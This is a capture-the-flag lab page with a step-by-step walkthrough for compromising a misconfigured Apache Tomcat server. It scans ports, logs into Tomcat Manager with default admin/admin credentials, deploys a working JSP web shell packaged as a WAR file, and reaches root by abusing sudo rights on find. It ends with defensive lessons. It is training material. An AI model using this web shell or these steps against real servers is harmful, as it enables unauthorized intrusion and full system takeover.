Lab Icon

Compromised 1

🔥 Can you compromise this misconfigured Tomcat server?

Medium 07 Dec 2025 Free Access Solution Available

Dive into a realistic web application penetration testing scenario featuring Apache Tomcat. This server has been left with dangerous default configurations and sudo misconfigurations that could lead to complete system compromise. 🎯 Master the art of web application exploitation, WAR file deployment, and Linux privilege escalation in this hands-on challenge.

2
Flags
40
Points
52%
Success Rate
Start Your Challenge

Launch your dedicated machine to begin hacking

~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Medium

Compromised 1 - Complete Solution Walkthrough

Step 1: Web Application Reconnaissance

  1. Start by scanning the target to identify open ports:
nmap -sS -sV -Pn <target-ip>
  1. The scan reveals that ports 80 (HTTP) and 8080 (Apache Tomcat) are open
  2. Navigate to the Tomcat web application:
http://<target-ip>:8080

Step 2: Tomcat Manager Access

  1. Look for the Tomcat Manager application:
http://<target-ip>:8080/manager/html
  1. Try common default credentials:
  2. Username: admin
  3. Password: admin
  4. Successfully access the Tomcat Manager interface

Step 3: WAR File Deployment

  1. Create a simple JSP web shell (note: reverse shells won't work as outbound traffic is blocked):
mkdir webshell
cd webshell
echo '<%@ page import="java.io.*" %><% String cmd = request.getParameter("cmd"); if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd); BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while((line = reader.readLine()) != null) { out.println(line + "<br/>"); } } %>' > shell.jsp
jar -cvf ../shell.war *
cd ..
  1. Deploy the WAR file through the Tomcat Manager interface
  2. Access your deployed web shell:
http://<target-ip>:8080/shell/shell.jsp?cmd=whoami

Step 4: Initial System Access

  1. Verify you have command execution as the 'hacker' user:
http://<target-ip>:8080/shell/shell.jsp?cmd=id
  1. Retrieve the user flag:
http://<target-ip>:8080/shell/shell.jsp?cmd=cat /home/flag-user.txt

Step 5: Privilege Escalation Enumeration

  1. Check sudo privileges for the current user:
http://<target-ip>:8080/shell/shell.jsp?cmd=sudo -l
  1. The output shows that the hacker user can run /usr/bin/find as root without a password

Step 6: Root Flag Retrieval

  1. With root privileges, retrieve the root flag:
http://<target-ip>:8080/shell/shell.jsp?cmd=sudo%20find%20/root%20-name%20flag-root.txt%20-exec%20cat%20%7B%7D%20%2B
  1. You now have both user and root flags, completing the challenge

Security Implications and Lessons Learned

  • Default Credentials: Using default credentials like admin/admin makes web applications vulnerable to unauthorized access
  • Tomcat Manager Exposure: Exposing the Tomcat Manager interface without proper access controls allows attackers to deploy malicious applications
  • Sudo Misconfigurations: Granting sudo access to powerful binaries like find can lead to privilege escalation
  • Defense: Change default credentials, restrict manager access, and carefully configure sudo permissions

Tools and Techniques Summary

  • nmap: Network reconnaissance and port scanning
  • JSP web shells: Custom web shell creation for command execution
  • Tomcat Manager: Web application deployment interface
  • find binary: Exploiting sudo misconfigurations for privilege escalation